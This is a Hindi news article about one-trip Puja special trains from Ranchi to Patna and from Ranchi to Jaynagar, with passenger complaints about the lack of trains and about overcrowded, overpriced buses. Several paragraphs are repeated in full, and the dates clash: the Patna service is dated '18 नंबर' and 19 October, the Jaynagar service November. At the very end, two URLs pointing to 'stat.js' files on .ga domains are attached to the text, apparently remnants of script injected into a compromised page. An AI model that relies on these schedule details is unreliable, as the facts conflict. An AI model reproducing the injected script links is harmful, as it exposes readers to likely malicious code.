पूजा स्पेशल चलने वाली ट्रेन का शेड्यूल जारी कर दिया गया। पटना-रांची फेस्टिवल स्पेशल ट्रेन गोमो, कोडरमा गाया होते हुए पटना पहुंचेगी। इसमे कुल 22 कोच है। जिसमें कोच 15 स्लीपर कोच होंगे, ऐसी के 3 कोच होंगे,सेकंड एसी का एक कोच और एसएलआर के 2 कोच हैं। इस ट्रेन को एक ट्रिप चलाए जाने से यात्रियों में काफी नाराजगी है।

 

 

गाड़ी संख्या 02849 रांची-पटना पूजा स्पेशल ट्रेन 18 नंबर को रात के 11:45 बजे रांची से केवल एक ट्रिप के लिए प्रस्थान करेगी। ट्रेन गोमो, कोडरमा, गया होते हुए पटना तक जाएगी। गाड़ी संख्या 02850 पटना-रांची पूजा स्पेशल 19अक्टूबर सुबह 9:00 बजे पटना से केवल एक ट्रिप के लिए चलाई जाएगी। ट्रेन का रूट पटना से गाया, कोडरमा गोमो होते हुए 5:25 बजे रांची पहुंचेगी।

 

 

पूजा स्पेशल ट्रेन 02870 रांची से जयनगर चलने वाली ट्रेन 18 नवंबर को केवल एक एक ही बार के लिए चलाई जाएगी। रांची से 4:10 बजे से खुलेगी और धनबाद, जसीडीह, बरौनी, दरभंगा होते हुए जयनगर तक जाएगी। गाड़ी संख्या 02169 जयनगर-रांची पूजा स्पेशल ट्रेन 19 नवंबर को सुबह 9:00 बजे जयनगर से केवल एक ट्रिप के लिए चलाई जाएगी। जो दरभंगा, बरौनी, जसीडीह और धन्यवाद होते हुए रांची को जाएगी। रांची से जयनगर जाने वाली पूजा स्पेशल ट्रेन थर्ड एसी के 3 कोच,सेकंड एसी के1 कोच और एसएलआर के कोच के साथ साथ कुल 16 कोच होंगे।

 

रांची से पटना सफर करने वाले यात्रियों को बड़ी उम्मीद थी की रांची-पटना जनशताब्दी ट्रेन त्योहार के मौके पर चलाई जाएगी। बहुत से लोग बिहार जाने के लिए इस ट्रेन की आस लगाए बैठे थे। लेकिन उनको निराशा के अलावा कुछ नहीं मिला, लोगों का कहना है की वह आस लगाए बैठे थे कि रेलवे द्वारा रांची-हावड़ा की तर्ज पर अब रांची-पटना जनशताब्दी ट्रेन को चलाया जाएगा। मगर रेलवे द्वारा ऐसा नहीं किया गया और लोगों को इसके चलते बहुत निराशा हुआ है। हो सकता है कि रेलवे द्वारा रांची पटना और रांची जयनगर के बीच एक ही ट्रेन चलाने की इजाजत दी हो तब यात्रियों की मुसीबत और बढ़ जाएगी।

 

 

लोग बताते हैं कि बिहार जाने के लिए अब उन्हें बस का ही सहारा लेना पड़ेगा। हालांकि बसों को भी इजाजत ना होने के बावजूद भी बहुत सारी बसें बिहार भेजी जा रही हैं। बसों चलाने में अधिकारियों का भी हाथ है और बस संचालक किराया वसूल अपनी मर्जी से कर रहे हैं। बसों में जगह ना होने के बावजूद भी लोग बेंच पर भी बैठ कर के 800 से ₹900 किराया देकर के पटना जाने के लिए मजबूर है।बसों में यात्रियों द्वारा कोरोनावायरस के नियमों का पालन भी नहीं किया जा रहा है बसो में संचालक और कंडक्टर द्वारा ना तो सैनिटाइजर का इस्तेमाल हो रहा है नहीं कोरोनावायरस से जुड़ी गाइडलाइन की पालन हो रही।

 

 

 

प्रशासन द्वारा इसका छापेमारी बहुत बार की गई लेकिन फिर भी कुछ नहीं बदला। रांची से पटना सफर करने वाले यात्रियों को बड़ी उम्मीद थी की रांची-पटना जनशताब्दी ट्रेन त्योहार के मौके पर चलाई जाएगी। बहुत से लोग बिहार जाने के लिए इस ट्रेन की आस लगाए बैठे थे। लेकिन उनको निराशा के अलावा कुछ नहीं मिला, लोगों का कहना है की वह आस लगाए बैठे थे कि रेलवे द्वारा रांची-हावड़ा की तर्ज पर अब रांची-पटना जनशताब्दी ट्रेन को चलाया जाएगा।

 

 

मगर रेलवे द्वारा ऐसा नहीं किया गया और लोगों को इसके चलते बहुत निराशा हुआ है। हो सकता है कि रेलवे द्वारा रांची पटना और रांची जयनगर के बीच एक ही ट्रेन चलाने की इजाजत दी हो तब यात्रियों की मुसीबत और बढ़ जाएगी। लोग बताते हैं कि बिहार जाने के लिए अब उन्हें बस का ही सहारा लेना पड़ेगा। हालांकि बसों को भी इजाजत ना होने के बावजूद भी बहुत सारी बसें बिहार भेजी जा रही हैं। बसों चलाने में अधिकारियों का भी हाथ है और बस संचालक किराया वसूल अपनी मर्जी से कर रहे हैं।

 

 

 

बसों में जगह ना होने के बावजूद भी लोग बेंच पर भी बैठ कर के 800 से ₹900 किराया देकर के पटना जाने के लिए मजबूर है।बसों में यात्रियों द्वारा कोरोनावायरस के नियमों का पालन भी नहीं किया जा रहा है बसो में संचालक और कंडक्टर द्वारा ना तो सैनिटाइजर का इस्तेमाल हो रहा है नहीं कोरोनावायरस से जुड़ी गाइडलाइन की पालन हो रही। प्रशासन द्वारा इसकी छापेमारी बहुत बार की गई लेकिन फिर भी कुछ नहीं बदला।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.